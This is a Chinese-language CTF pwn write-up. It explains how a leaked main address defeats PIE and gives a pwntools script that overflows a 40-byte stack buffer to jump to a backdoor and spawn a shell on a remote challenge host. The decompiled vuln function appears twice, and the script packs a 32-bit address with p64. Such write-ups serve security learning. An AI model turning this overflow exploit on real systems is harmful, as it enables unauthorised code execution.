第一次打CTF——PWN篇学习笔记14
这道题开启了PIE保护,但程序中直接泄露了main函数的随机地址,因此我们可以进行直接计算
int __cdecl main(int argc, const char **argv, const char **envp) { setbuf(stdin, 0); setbuf(stdout, 0); puts("OHHH!,give you a gift!"); printf("%p\n", main); puts("Input:"); vuln(); return 0; } ssize_t vuln() { _BYTE buf[40]; // [esp+0h] [ebp-28h] BYREF return read(0, buf, 0x50u); } ssize_t vuln() { _BYTE buf[40]; // [esp+0h] [ebp-28h] BYREF return read(0, buf, 0x50u); }又发现栈溢出和后门函数,且main函数地址为0x770,shell函数地址为0x80F,据此编写脚本,即可得到flag
from pwn import * import struct context.arch = 'i386' context.os = 'linux' #io = process('./pwn') io = remote("node5.anna.nssctf.cn",23609) io.recvuntil(b"OHHH!,give you a gift!\n") main = int(io.recvline().strip(), 16) backdoor = main - 0x770 + 0x80F payload = cyclic(0x28 + 4) + p64(backdoor) io.sendline(payload) io.interactive()
